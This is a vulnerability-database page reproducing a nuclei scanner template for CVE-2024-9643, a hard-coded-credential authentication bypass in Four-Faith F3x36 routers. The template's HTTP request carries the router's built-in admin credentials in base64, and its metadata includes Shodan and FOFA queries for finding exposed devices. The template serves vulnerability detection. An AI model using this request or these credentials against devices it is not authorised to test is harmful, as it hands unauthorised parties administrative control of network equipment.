Lucene search
K

Four-Faith F3x36 - Authentication Bypass

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Authentication bypass in Four-Faith F3x36 firmware allows admin access with hardcoded credentials.

Related
Refs
Code
id: CVE-2024-9643

info:
  name: Four-Faith F3x36 - Authentication Bypass
  author: trader642
  severity: critical
  description: |
    Four-Faith F3x36 router with firmware v2.0.0 contains an authentication bypass caused by hard-coded credentials in the administrative web server, letting attackers with knowledge of credentials gain administrative access via crafted HTTP requests.
  impact: |
    Attackers can gain unauthorized administrative access, potentially leading to full control over the device.
  remediation: |
    Update to the latest firmware version provided by the vendor to fix hard-coded credential issues.
  reference:
    - https://vulncheck.com/advisories/four-faith-hard-coded-creds
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1752
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9643
    epss-score: 0.0296
    epss-percentile: 0.85462
    cwe-id: CWE-798
  metadata:
    verified: true
    max-request: 1
    vendor: four-faith
    product: f3x36
    shodan-query: "Four-Faith"
    fofa-query: body="Four-Faith"
  tags: cve,cve2024,four-faith,default-login,router,iot,auth-bypass,vkev

http:
  - raw:
      - |
        GET /Status_Router.asp HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic ZmZhZG1pbjpmZmFkbWluZmY=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Four-Faith","Status")'
          - 'contains(server, "httpd_four-faith")'
        condition: and
# digest: 4a0a00473045022061d7b5db5d2ec76a6748231c8fbb8529bb736620c4e9da35a6128c6c4258f2c0022100c166d1d9af5cae563cd51d1019e0f5b5c18ee32a29f2ff276a01516c9a736f69:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2026 00:05Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.0296
SSVC
17